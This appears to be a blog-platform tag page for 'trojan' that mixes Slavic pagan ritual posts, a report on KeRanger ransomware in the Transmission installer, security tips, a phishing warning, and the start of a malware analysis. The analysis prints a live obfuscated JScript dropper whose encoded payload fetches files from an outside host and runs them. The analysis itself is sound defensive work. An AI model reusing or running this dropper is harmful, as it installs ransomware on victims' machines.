Случайны выбор дневника Раскрыть/свернуть полный список возможностей


Найдено 801 сообщений
Cообщения с меткой

троян - Самое интересное в блогах

Следующие 30  »
Школа_славянской_магии (Автор -Бася_Ведающая)

Защита на Троянов день

Воскресенье, 22 Мая 2016 г. 07:51 (ссылка)


В этот день можно поставить себе и своим близким, как и своему дому защиту. Хорошо было ы в этот день разложить костер на природе, но не у каждого есть такая возможность. Поэтому сделайте самую большую восковую свечу, которую только сможете. Предварительно купите дары Перуну, Сварогу и Велесу. Для защиты соберите фотографии тех, кото вы будете защищать и купите полметра широкой ярко-желтой ленты. Знаки будем ставить на ленту, так что купите 2 ленты по полметра и потренируйтесь что будет писать на ленте.



Итак, на столь выставляются дары богам, много – не надо, вопрос не в количестве, а в качестве, чтобы от души. Например хорошего пива –хватит. Если вы на природе, то перед призываем каждого из богов отливайте немного пива в костер из бутылки, обещанной данному богу на требу. Если дома - то выставьте бутылки на стол, где работаете. Если вы не выносите требы сразу после работы, то бутылки с пивом не открываете.



Итак, бутылки поставили, свечу зажгли, ленту расстелили. Начинаем ставить формулу. Знаю, что выучить текст кому-то будет лень, а у кого-то не хватит на это времени. Поэтому сначала поставьте формулу, а потом, читая текст, обводите поставленное пальцем. Заговор читаем 1 раз:



Три мира единым стоят, единым стоят, на зов мой откликаются, с силою вставшею супротив меня, моей семьи (перечислить кого защищаете) дома и двора моего справляются. Сварог, кузнец небесный, услышь меня, защити меня, моих (перечисляем) дом да двор мой от несправедливости да обиды людской, от зависти да навета, от урока да заповета, от слова чужого да от врага-недруга, силой своею закрой, силой Прави от всего сказанного да перечисленного укрой! Кланяюсь тебе, Свароже! Да будет так!



Перун – громовержец, услышь призыв мой, защиту свою в Яви явленную мне, семье моей (перечислить) дому и двору моему дай, тех, кто со злобой, во злобу, горе и беду нести будет, с мечом иль словом, с делом иль с мыслью – накажи их, покарай, пожеланное да сделанное трижды умноженное им возвращай! Кланяюсь тебе, Перуне! Да будет так!



Велесе – мудрый, дороги знающий, услышь призыв мой, защиту Навью мне, моей семье (перечислить), дому и двору моему дай, от колдовства злого, ведьмы и ведьмака, девки аль парубка, старухи аль старика, молодухи аль мужика, старого аль молодого – защищай! Кто с глазом черным, словом злым, делом дурным, ко мне, к моей семье (перечислись), к дому и двору моему пойдет, ни меня, ни семьи моей, ни дома и двора моего не найдет, теневыми тропами в Навь попадет, да там и останется! Кланяюсь тебе, Велесе! Да будет так!



Как три мира триедины, так и защита трех миров, трех богов на мне, на моей семье (перечислить), на моем доме, на моем дворе – едина, камнем стоит, силой тот камень оповит, да защиту сию хранит! Да будет так!



Затем берем фотографии, складываем их стопкой и обвязываем лентой. Ленту завязываем на 3 узла со словами: первый узел вязала – защита на всех сказанных да перечисленных встала, второй узел вязала – защиту на замок закрыла, да от снятия и просмотра защитила, третий узел вязала – ключи от замка прятала да в жгут свивала, кто жгут разовьет, ключи из того жгута скует, тот и защиту проглянуть да снять сможет. Да будет так! 



После чего закапываем узлы воском с горящей свечи. Свечу в подсвечнике ставим на фотографии догорать. После фотографии прячем подальше, а требы – богам.



Став состоит из: 3-х чиров Сварога, Перуна, Велеса и рун Сила, Опора и Треба.

Изображение



(c) Bast



Читать в источнике (с комментариями и подробными пояснениями) http://bastiliya.com/slavrun-formuli/maya-yarilo-mokr-troyan-zashita-t1324.html

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
Баст_Ведающая

Круг силы на Троян Мокрый (22 мая)

Четверг, 19 Мая 2016 г. 22:21 (ссылка)

Это цитата сообщения Бася_Ведающая Оригинальное сообщение

Круг силы на Троян Мокрый




Совместный круг на ТРОЯН!



Предлагаем поработать в этот день на обретение Силы и постановку защит личных и на свою семью.






Время круга - 22-30 по МСК

Место проведения Круга: Бастилия, Светлый чат




В программе Круга



1. Заговор на прилив силы и энергии на воду.  



2. Омовень "Девятисильный" (на здоровье и силу) 



3. Защита на нож (атам) На Силе Перуна.  



4. Защита на силе воды  



5. Защита для семьи и близких на свечу  



 


Изображение




Приглашаем всех желающих!



записаться и узнать подробности тут http://bastiliya.com/post37174.html#p37174



 



Серия сообщений "Праздники славян":



Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
Школа_славянской_магии (Автор -Бася_Ведающая)

Круг силы на Троян Мокрый

Четверг, 19 Мая 2016 г. 14:51 (ссылка)


Совместный круг на ТРОЯН!



Предлагаем поработать в этот день на обретение Силы и постановку защит личных и на свою семью.






Время круга - 22-30 по МСК

Место проведения Круга: Бастилия, Светлый чат




В программе Круга



1. Заговор на прилив силы и энергии на воду.  



2. Омовень "Девятисильный" (на здоровье и силу) 



3. Защита на нож (атам) На Силе Перуна.  



4. Защита на силе воды  



5. Защита для семьи и близких на свечу  



 


Изображение




Приглашаем всех желающих!



записаться и узнать подробности тут http://bastiliya.com/post37174.html#p37174



 

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
Школа_славянской_магии (Автор -Бася_Ведающая)

22 мая Ярило Мокрый Троян

Четверг, 19 Мая 2016 г. 14:48 (ссылка)


22 мая Ярило Мокрый, Троян


 



ярило



22 мая отмечают Троян (Трибогов День) — праздник конца весны и начала лета, когда на смену младому Яриле-Весеню приходит Трисветлый Даждьбог. Святодень, посвященный победе Бога Трояна над Черным Змеем. О сию пору родноверы прославляют Сварожий Триглав — Сварога-Перуна-Велеса, сильных во Прави, Яви и Нави. По поверьям, Троян явился воплощением мощи Сварога, Перуна и Велеса, соединивших свои силы в борьбе со Змеем, порождением Чернобога, грозившим некогда уничтожить все Тремирье.



О сию пору издревле поминали предков и творили обереги от бесчинств, творимых русалками и неприкаянными душами «заложных» покойников (умерших «не своей», то есть неестественной смертью). В ночь на Трояна девицы и женщины «опахивали» деревню, дабы оберечься от злых сил.



В конце мая природа радует глаз буйством красок. Ярило открывает небо, и зеленые травы наливаются волшебной силой. Уходит Весна, приходит Лето. До восхода Солнца умываются целебной росой, обходят нивы с хлебом, освещают дома и ворота. В этот день Ярило-Солнце показывает свою силу. После Ярилы обычно устанавливается жаркая погода дней на семь. От того праздник сей также называют Семик.



«Мокрым» же Ярила зовётся о сию пору потому, что Силу Свою явил — зарод Земле сотворил. Скоро, на Купалу он, Старцем обратясь, на Небо уйдёт, но Сила Его Ярая всуе не пропадёт: Земля-Матушка священный Плод — добрый Урожай — во срок свой принесёт! Тако же и от веку было — всё по Закону Родову; тако же и мы Ярилу чествуем — всё по Искону Русскому! 



ярило



Во День сей люди собираются на Капище, славят Ярилу, просят у Него Силы:





ЯРИЛО СИЛЬНЫЙ ХОДИ ДО НЫ

ПРЕБУДИ ВО ЯРИ! ГОЙ!

ЯРИЛО СЛАВНЫЙ СТАНИ СРЕДЬ НЫ

ПРЕБУДИ ВО ЯРИ! ГОЙ!

ЯРИЛО ЖГУЧИЙ ВСПОЛЫМИ НЫ

ПРЕБУДИ ВО ЯРИ! ГОЙ!

СЛАВА ЯРИЛЕ!

ГОЙ!






Волхвы выносят Яруна, ставят его на рушник, обсыпают зерном, воскладают пред ним жертвенные дары Яриле. Жрец из особого кувшина возливает на Яруна наговорённую девятисильную воду, настоянную на девяти волшебных травах. Волхв вопрошает:



— Что Ярила?



Жрец ему ответствует:



— КОЛО ВОЗЖЁГ! — То есть воссиял Вешним Солнцем.



Затем — вновь возливает воду на Яруна. Волхв вопрошает:



— Что Ярила?



Жрец ответствует:



— НА РОСУ ПОШЁЛ! — То есть сотворил зарод Земле-Матушке.



И — в третий раз возливает на Яруна воду. Волхв вопрошает:



— Что Ярила?



Жрец ответствует:



— ЖИТОМ ВЗОШЁЛ! — То есть взошёл Урожаем.



После сего волхв обращается ко всем собравшимся и, воздев руки горе, громкогласно речёт:



— Слава Яриле-Батюшке!



Народ подхватывает славу:



— Гой!



Волхв — вдругорядь:



— Слава Яриле-Батюшке!!



Народ:



— Гой!!



Волхв — в третий раз:



— Слава Яриле-Батюшке!!!



Народ:



— Гой!!!




Ярило-Солнце Волхвы выносят Яруна, ставят его на рушник, обсыпают зерном, воскладают пред ним жертвенные дары Яриле. Жрец из особого кувшина возливает на Яруна наговорённую девятисильную воду, настоянную на девяти волшебных травах.



жрец





Затем всем миром кланяются Яриле да пускают по кругу братину с хмельным мёдом либо пивом — священным напитком Ярилы — не бесчинства ради, но на доброе веселье да на здравие. Когда братина обойдёт всех собравшихся, мужи да юноши выходят плясать обрядовый пляс, именуемый жёг: встают в коло, обхватывая друг друга за плечи, и начинают движение — один шаг противосолонь, два шага посолонь — с притопом, сначала медленно, затем постепенно ускоряясь. Колени поднимают как можно выше: чтобы жито росло высоко.



братина



В этот день было принято делать амулеты и обереги, охраняющие от различной нечисти, русалок и умерших не своей смертью. Считалось, что нечистая сила боится Трибогова дня и не выходит из своих убежищ, а в ночь, открывается Сыра-Земля и дает возможность посвященным заглянуть в свои тайны. Поэтому колдуны и знахари старались попасть в эту ночь в лес, в надежде обнаружить зарытые клады.



Знахари собирали в этот день росу на весь год, она считалась особо целебной.



В народе говорили: «С Духова дня не с одного неба — из-под земли тепло идет», «Придет Свят Дух — будет на дворе, как на печке». Согласно народным поверьям, сего дня как огня боится всякая нечисть, а перед самым Солнечным восходом на Духов день открывает Мать Сыра-Земля свои тайны, и потому знахари ходят в это время «наслушивать клады». Как и на Ярилу Вешнего, вода в этот день считается священной и целебной.



После зачина проводят обряд «Постриги» для юношей, посвящение в воины. После него юноши становились настоящими мужчинами, воинами. 



постриги



Когда мальчику исполняется 3 года, ему постригают волосы в знак перехода на новую ступень жизни. Постриженному дают взрослое славянское имя и впервые сажают на коня. Выстриженные волосы собираются в наузы и передают матери. После обряда все шли пировать. Во время пира над головой постриженного разламывали именинный каравай с пожеланием счастья, здоровья и благополучия. Следующие постриги проводятся в 7 лет.



Далее устраивают пир в поле. Обрядовая страва: сладости, яичница, пироги. В требу приносят обрядовое пиво. Перед игрищами разыгрывают сказку или древнее предание. Обязательны любовные игрища и пляски.



игрища





Немаловажно в Ведической традиции значение Триглава - объединения трех божеств, которые представляют собой энергии и силы, правящие в мироздании и создающие коловращение - принцип жизни.



триглав



Новый Триглав - это Сварог, Перун и Световит (Святовит, Свентовит)). Сварог - создатель нашего мира, Исток всего, Крыница. От этой Крыницы питались духовной энергией наши пращуры. Он - причина всего сущего.



Перун - тот, кто оживляет явленное, приводит в движение то, что создано Сварогом, он вращает Коло Рода - колесо жизни. Таким образом, то, что было, повторится вновь. Это великое коловращение, которое символизирует священный арийский знак - Коловрат (Свастика). И Перун ведёт нас Стезею Прави. 



Третим ликом Триглава является Световит - тот, кто единит Сварога и Перуна. В давние времена Святовит был великаном Святогором, сыном самого Рода Рожанича. Святогор познал всю мудрость земную, и потому Велес передал ему свою силу через Черный Камень. Также существуют разнообразные малые Триглавы, которые создают целостную систему энергий, правящих миром.



... главу перед Триглавом склоните!

Так мы начинали,

великую славу Ему воспевали,

Сварога — Деда Богов восхваляли,

что ожидает нас.

Сварог — старший Бог Рода Божьего

и роду всему — вечно бьющий родник...

И Громовержцу — Богу Перуну,

Богу битв и борьбы...

И Свентовиту мы славу рекли.

Он есть и Права, и Яви Бог!

Песни поем мы Ему, ведь Свентовит — это Свет.




Триглава почитали все славяне, но некоторые народы поклонялись ему особо. У города Штетина, рядом с целебным источником, на главном из трех священных холмов, стоял на высоких столбах, обтянутых черным сукном, великолепный храм Триглава. У подножия единственной статуи лежали груды сокровищ — десятая часть от военных трофеев.



Статуя триединого бога была закрыта покрывалом, а на устах и глазах у него были золотые повязки. Считалось, что Триглав неусыпно следит за всеми царствами: Правью, Явью и Навью. Взгляд бога и его слово обладали такой силой, что способны были с легкостью сломать тонкие преграды между мирами.



триглав



И тогда миры, смешавшись, поменялись бы местами, а это означало наступление конца света. Поэтому Триглаву прислуживало много жрецов, которые следили, чтобы его статуя всегда была плотно закрыта тканью, а волю бога они излагали сами. Для предсказаний использовали и черных коней Триглава.



Изображения Триглава могли существенно отличаться друг от друга по размерам. В Гостькове, например, он был столь велик, что завоеватели не могли его повалить даже с помощью нескольких пар волов. А в Юлине этот бог, отлитый из золота, был настолько мал, что его спрятали от наступавших рыцарей в дупле дерева.



Иностранные хронисты считали Триглава одним из многочисленных сонмов славянских богов, не понимая, что в этом главнейшем символе была выражена сама суть нашей древней веры: бог един, но у него множество проявлений. Чаще всего, это три главные сущности: Сварог, Перун и Световит (Велес).



троян



Бог Троян – сын Велеса и Марены. По поверьям, Троян явился воплощением мощи Сварога, Перуна и Велеса, соединивших свои силы в борьбе со Змеем, порождением Чернобога, грозившим некогда уничтожить всё Тремирье. В Древнерусской мифологии именно Перун ( Троян ) поражает копьём змея. Или известный бой Добрыни со Змеем. Однако после христианизации это местно было занято так называемым св. Георгием.



Бог Траян - Бог-Хранитель Праведных Путей ведущих во Сваргу, управляет Временем и Пространством. Из Славянской мифологии: О поклонении Трояну–Батюшке сообщается в древних славянских преданиях (поздней, впрочем, записи), в средневековых русских летописях, в сказаниях и литературе родственных нам народов. Имя Трояна в русской литературе приводится рядом с именами Великих Божеств, что говорит и о Величии Трояна .



Согласно славянским мифологическим положениям, Троян также, суть – первокнязь. Он единственный из Богов, кто правил на земле Руси, в мире людей. Все княжеские династии произошли от него – недаром родовой знак Рюриковичей изображает трезубец Трояна . Та древняя, мифическая доисторическая пора, когда миром правил Троян , по сути, и есть пресловутый «Золотой Век», ибо тогда на земле было благоденствие, достаток и царила справедливость, и мир был цел. 



Это и были «Века Трояновы », времена былин и сказок. Понятие же «Тропы Трояна » мы рассмотрим в ином изложении, поскольку данное речение является мистическими и требует особого исследования. Впрочем, стоит упомянуть, что одно из имен Пути Млечного – « Троянова дорога». Земля же Трояна – весь мир, всё обжитое цивилизованное пространство, территория Владычества Славяно-Арийских народов.





После дня Ярилы обычно устанавливается жаркая погода дней на семь.



Где Ярило пройдет – будет хороший урожай, на кого посмотрит – у того в сердце разгорается любовь.



Этого дня, как Сварожьего огня, боится и избегает всякая нечистая сила.



Ярило, вставай рано, яр-яр вставай рано;

Ярило, мыйся бело, яр-яр мыйся бело;

Ярило, седлай коня, яр-яр седлай коня;

Ярило, езди в поле, яр-яр езди в поле;

Ярило, возьми ключи, яр-яр возьми ключи;

Ярило, отмкни Землю, яр-яр отмкни Землю;

Ярило, пусти траву, яр-яр пусти траву;

Ярило, зеленую, яр-яр зеленую;

Ярило, пусти росу, яр-яр пусти росу;

Ярило, медвяную, яр-яр медвяную;

Ярило, дай нам долю, яр-яр дай нам долю;

Ярило, счастливую, яр-яр счастливую!




ярило


 











Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
rss_rss_hh_new

Зловред в официальной версии Transmission. Первый известный троян-вымогатель для Mac

Понедельник, 07 Марта 2016 г. 09:48 (ссылка)

В официальной версии open source торрент-клиента Transmission 2.90 под Mac обнаружена вредоносная программа OSX.KeRanger.A. Первыми её заметили российские пользователи Mac, которые утром 5 марта подняли тревогу на форуме Transmission.







Наличие зловреда на официальном сайте Transmission подтвердили и другие. Инсталлятор подписан сторонним ключом, что может указывать на взлом сервера Transmission посторонними лицами. При этом злоумышленники использовали валидный сертификат Apple Developer, так что у Gatekeeper в OS X не было причин для показа предупреждающих сообщений. Сейчас сертификат аннулирован.



ID сертификата злоумышленников — "POLISAN BOYA SANAYI VE TICARET ANONIM SIRKETI (Z7276PX673)".







6 марта специалисты по безопасности из Palo Alto Networks опубликовали технический анализ зловреда OSX.KeRanger.A, хотя им не удалось понять, как он попал на официальный сайт Transmission.



Сообщается, что заражение двух инсталляторов .DMG на офсайте произошло утром 4 марта примерно в 11:00 PST. Распространение заражённых файлов продолжалось до 5 марта 19:00 PST.



OSX.KeRanger.A – первый дееспособный троян-вымогатель под OS X. После установки в папке /Users//Library/kernel_service (файл General.rtf) он ждёт трое суток, пингуя управляющий сервер через сеть Tor каждые пять минут.



Через трое суток троян начинает шифровать документы 300 определённых форматов на компьютере, по завершении процесса требует у пользователя выкуп 1 биткоин за их расшифровку. Деньги следует перечислить на адрес 1PGAUBqHNcwSHYKnpHgzCrPkyxNxvsmEof.







Специалисты выдвигают версию, что KeRanger всё ещё находится в разработке: в коде есть неиспользуемые функции под названиями _create_tcp_socket, _execute_cmd и _encrypt_timemachine. Вероятно, авторы зловреда работают над тем, что шифровать ещё и бэкап Time Machine.







Apple отозвала сертификат злоумышленников. Разработчики Transmission 5 марта удалили заражённые файлы с сервера и уже выпустили версию Transmission 2.92, которая проверяет компьютер на заражение OSX.KeRanger.A.



P.S. Образцы заражённых инсталляторов Transmission см. здесь (пароль: KeRanger).



Original source: habrahabr.ru (comments, light).

https://habrahabr.ru/post/278723/

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
Совет1

Совет 1: Как удалить троянский вирус

Понедельник, 04 Января 2016 г. 14:58 (ссылка)

Вполне можно допустить, что далеко не все способны вспомнить историю осады города Троя, но выражение "троянский конь" слышал, наверное, каждый. Настоящий троянский конь, тот самый, благодаря которому пала Троя, представлял собой большого деревянного коня, воспринятого жителями Трои в качестве подарка, но вот только спрятавшиеся внутри вражеские воины открыли ночью городские ворота, впустили армию внутрь и город пал. Современные трояны ведут себя похожим образом, только жертвой падения становятся не древние города, а наши с вами компьютеры. ..Далее

Комментарии (0)КомментироватьВ цитатник или сообщество
Совет1

Как удалить nod32

Суббота, 26 Декабря 2015 г. 19:41 (ссылка)

Антивирус nod32 заслуженно является одним из лидеров среди антивирусных программ, позволяя эффективно защищать систему от самых разнообразных вирусных угроз...Далее

Комментарии (0)КомментироватьВ цитатник или сообщество
Удав102

Российских пользователей атакует банковский троян TINBA

Воскресенье, 08 Ноября 2015 г. 21:08 (ссылка)


Российских пользователей атакует банковский троян TINBA



Небольшой банковский троян Tinba атаковал пользователей из России и Украины. По данным шведского ресурса Abuse.ch, в прошлом месяце зафиксировано около 33000 заражений Tinba 2.0, около трети пострадавших – пользователи из России, еще четверть – поляки. По данным Dell SecureWorks, целью данного трояна являются крупнейшие российские банки и платежные системы.



Сообщается, что это довольно нетипичная ситуация, так как зачастую вредоносные кампании с использованием банковской малвари координируются именно хакерскими группами из России и Украины, но весьма редко бывают нацелены на эти страны. В качестве цели злоумышленники выбирают пользователей из ЕС и Серверной Америки. Но в данном случае хакеры нацелились на РФ. Dell SecureWorks сообщает, что один из российских банков-мишеней входит в пятерку крупнейших банков Европы. 

Метки:   Комментарии (1)КомментироватьВ цитатник или сообщество
Andrey_GREEN

Простые правила безопасности при работе с деньгами

Вторник, 20 Октября 2015 г. 09:43 (ссылка)

6809390 (300x225, 1486Kb)
Уважаемые ЧЕЛОВЕКИ !))

Обращаем Ваше внимание на то, что в последнее время участились случаи поступления клиентам «Банка Москвы» писем, которые маскируются под официальные письма от банка. Данные письма рассылаются с поддельных электронных адресов и могут содержать информацию по содержанию похожую на письма «Банка Москвы» (например, по итогам операции).
Также в поддельных письмах могут содержаться файлы или ссылки на файлы, расположенные в Интернете, зараженные вредоносным программном обеспечением.

При получении подобного письма необходимо удалить его, не открывая вложения или ссылки.
Если же Вы уже открывали или пытались открыть данные вложения, необходимо провести полное сканирование компьютера на наличие вредоносного ПО.

Как отличить настоящее письмо? Банк Москвы направляет email с адресов, которые заканчиваются @mmbank.ru, а sms – только с адреса BankMoskvy. Помните, что сотрудники банка никогда не просят сообщить ваши личные данные (такие как логин и пароль от Интернет-банка или Мобильного банка, а также ПИН-код к карте) по телефону, в электронном письме или по sms.

Если полученное письмо вызывает у вас подозрение, обратитесь в банк по телефонам:
+7(495) 745-79-69, +7(495) 925-80-00 (в Москве) или 8(800) 200-23-26 (в регионах)

Метки:   Комментарии (1)КомментироватьВ цитатник или сообщество
rss_rss_hh_new

Анализ одной из модификаций шифровальщика VaultCrypt

Понедельник, 14 Сентября 2015 г. 10:08 (ссылка)

Привет, хаб!



На днях (примерно месяц назад) мне достался образец письма с троянцем, рассылаемого по электронной почте. Вообще я не являюсь профессионалом в анализе вредоносных файлов, но в данном случае оказалось, что простейший анализ можно провести и без глубоких знаний.



Раньше я такого не делал, так что мне стало интересно посмотреть, что же можно отсюда вытянуть. Под катом — разбор кода дроппера и исполняемого bat-файла.



TL;DR: под катом — практически построчный разбор довольно большого и муторного BAT-файла. Код, картинки, минимум мыслей.



ATTENTION: некоторые антивирусы (в частности, мой Avast!) очень негативно реагируют на приведенные фрагменты JS-кода. При включенном Avast! у меня вместо статьи отображалась пустая страница с сообщением «Соединение было сброшено». Учтите это, если захотите почитать.



NB:
В попытках понять, что происходит, я провел несколько экспериментов, в результате чего стал счастливым обладателем пятидесяти черновиков постов. И я слишком поздно осознал, что удалить на Хабре черновик невозможно.)





1. Деобфускация дроппера





Итак, вначале было письмо. Текст письма был примерно таким: добрый день, пишет вам бухгалтер ООО «Копыта и рога», прошу вас ознакомиться с прилагаемым актом сверки.



К письму прикреплено вложение: zip-архив, внутри которого находится js-файл со следующим именем:



Акт сверки Июль. Оборотно-сальдовые данные по состоянию на 11.08. Необходимо согласовать в срочном порядке.dос .js


Вот как выглядело его содержимое:
//// uxqTUNgSeIQPIzvREL2BBpQKqgkAqK3RnG7HD15SZkPpEc3TNM
///// uxqTUNgSeIQPIzvREL2BBpQKqgkAqK3RnG7HD15SZkPpEc3TNM

eval(function(d, e, a, c, b, f) {
b = function(a) {
return (a < e ? "" : b(parseInt(a / e))) + (35 < (a %= e) ? String.fromCharCode(a + 29) : a.toString(36));
};
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
if (!"".replace(/^/, String)) {
for (;a--;) {
f[b(a)] = c[a] || b(a);
}
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
c = [function(a) {
return f[a];
}];
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
b = function() {
return "\\w+";
};
a = 1;
}
for (;a--;) {
c[a] && (d = d.replace(new RegExp("\\b" + b(a) + "\\b", "g"), c[a]));
}
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
return d;
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
}
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
('4 3="%j%\\\\";5 7(a){k 8 e(a)}4 9=7("l.m"),3=9.n(3);5 f(a,d){4 b=8 7("o.p"),c=(8 e("q.r.6.0")).s("t");c.u="v.w";c.x=a;c=c.y;b.z=1;b.A();b.B(c);b.C(d,2);b.D()}5 g(a){9.E(a,0,0)}f("F=",""+3+"h.i");g(""+3+"h.i");', 42, 42, " MT33 var function CreateObject new JS02 ActiveXObject JS04 JS10 update js temp return WScript Shell ExpandEnvironmentStrings ADODB Stream Msxml2 DOMDocument createElement tmp dataType bin base64 text nodeTypedValue Type Open Write SaveToFile Close Run DQp2YXIgSlMwMz0iJXRlbXAlXFwiOw0KZnVuY3Rpb24gQ3JlYXRlT2JqZWN0KGIpe3JldHVybiBuZXcgQWN0aXZlWE9iamVjdChiKX0NCnZhciBKUzAyPUNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpOw0KSlMwMz1KUzAyLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhKUzAzKTsNCmZ1bmN0aW9uIGpqKGIsZCl7dmFyIGM9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5YTUxIVFRQIik7Yy5vcGVuKCJHRVQiLGIsMCk7Yy5zZW5kKCk7DQpuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKTt2YXIgYT1uZXcgQWN0aXZlWE9iamVjdCgiQURPREIuU3RyZWFtIik7DQphLk9wZW4oKTthLlR5cGU9MTthLldyaXRlKGMuUmVzcG9uc2VCb2R5KTthLlBvc2l0aW9uPTA7YS5TYXZlVG9GaWxlKGQsMik7YS5DbG9zZSgpfQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZG9jLmNzcycsJycrSlMwMysnZG9jLmRvYycpOw0KZnVuY3Rpb24gSlMxMShKUzEyKXtKUzAyLlJ1bihKUzEyLDEsMCk7fQ0KdHJ5IHtKUzExKCcnK0pTMDMrJ2RvYy5kb2MnKTt9DQpjYXRjaChKUzAwNyl7fQ0KZnVuY3Rpb24gSlMxMChKUzEyKXtKUzAyLlJ1bihKUzEyLDAsMCk7fQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZGVzaWduLmNzcycsJycrSlMwMysnZGVzaWduLmNzcycpOw0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvaW5zLmNzcycsJycrSlMwMysnaW5zdGFsbC5iYXQnKTsNCkpTMTAoJycrSlMwMysnaW5zdGFsbC5iYXQnKTs".split(" "),
0, {}));
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
///// 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
///// VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY


Первый мой шаг был достаточно очевиден: убрать комментарии, которые, как видно, не несут никакой смысловой нагрузки. В данном случае файл небольшой, убрать комментарии можно вручную — или же можно воспользоваться регулярными выражениями. Например, во многих текстовых редакторах можно просто заменить на пустую строку все строки, подпадающие под шаблон ^\s*////.*\n (он выберет все строки, которые начинаются с четырех слешей).



На закуску можно добавить щепотку форматирования.



После этого получим следующее:
eval(function(d, e, a, c, b, f) {
b = function(a) {
return (a < e ? "" : b(parseInt(a / e))) + (35 < (a %= e) ? String.fromCharCode(a + 29) : a.toString(36));
};

if (!"".replace(/^/, String)) {
for (;a--;) {
f[b(a)] = c[a] || b(a);
}
c = [function(a) {
return f[a];
}];
b = function() {
return "\\w+";
};
a = 1;
}

for (;a--;) {
c[a] && (d = d.replace(new RegExp("\\b" + b(a) + "\\b", "g"), c[a]));
}

return d;
}

('4 3="%j%\\\\";5 7(a){k 8 e(a)}4 9=7("l.m"),3=9.n(3);5 f(a,d){4 b=8 7("o.p"),c=(8 e("q.r.6.0")).s("t");c.u="v.w";c.x=a;c=c.y;b.z=1;b.A();b.B(c);b.C(d,2);b.D()}5 g(a){9.E(a,0,0)}f("F=",""+3+"h.i");g(""+3+"h.i");',
42,
42,
" MT33 var function CreateObject new JS02 ActiveXObject JS04 JS10 update js temp return WScript Shell ExpandEnvironmentStrings ADODB Stream Msxml2 DOMDocument createElement tmp dataType bin base64 text nodeTypedValue Type Open Write SaveToFile Close Run DQp2YXIgSlMwMz0iJXRlbXAlXFwiOw0KZnVuY3Rpb24gQ3JlYXRlT2JqZWN0KGIpe3JldHVybiBuZXcgQWN0aXZlWE9iamVjdChiKX0NCnZhciBKUzAyPUNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpOw0KSlMwMz1KUzAyLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhKUzAzKTsNCmZ1bmN0aW9uIGpqKGIsZCl7dmFyIGM9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5YTUxIVFRQIik7Yy5vcGVuKCJHRVQiLGIsMCk7Yy5zZW5kKCk7DQpuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKTt2YXIgYT1uZXcgQWN0aXZlWE9iamVjdCgiQURPREIuU3RyZWFtIik7DQphLk9wZW4oKTthLlR5cGU9MTthLldyaXRlKGMuUmVzcG9uc2VCb2R5KTthLlBvc2l0aW9uPTA7YS5TYXZlVG9GaWxlKGQsMik7YS5DbG9zZSgpfQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZG9jLmNzcycsJycrSlMwMysnZG9jLmRvYycpOw0KZnVuY3Rpb24gSlMxMShKUzEyKXtKUzAyLlJ1bihKUzEyLDEsMCk7fQ0KdHJ5IHtKUzExKCcnK0pTMDMrJ2RvYy5kb2MnKTt9DQpjYXRjaChKUzAwNyl7fQ0KZnVuY3Rpb24gSlMxMChKUzEyKXtKUzAyLlJ1bihKUzEyLDAsMCk7fQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZGVzaWduLmNzcycsJycrSlMwMysnZGVzaWduLmNzcycpOw0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvaW5zLmNzcycsJycrSlMwMysnaW5zdGFsbC5iYXQnKTsNCkpTMTAoJycrSlMwMysnaW5zdGFsbC5iYXQnKTs".split(" "),
0,
{}));


Окей — стало получше, хоть и не сильно. :)



Что мы видим? Самой первой идет функция eval() — выполнить код. Какой код? Который вернет нам функция function(d, e, a, c, b, f). Откуда она берет параметры? А они указаны сразу после объявления функции. Все шесть штук — с a по f — в наличии:



('4 3="%j%\\\\";5 7(a) <....>,
42,
42,
" MT33 var function CreateObject <....>,
0,
{})


Повкуривав код пару минут, я неожиданно вспомнил, что мозгов-то у меня ведь и нет, и решил попробовать пойти по пути наименьшего сопротивления.



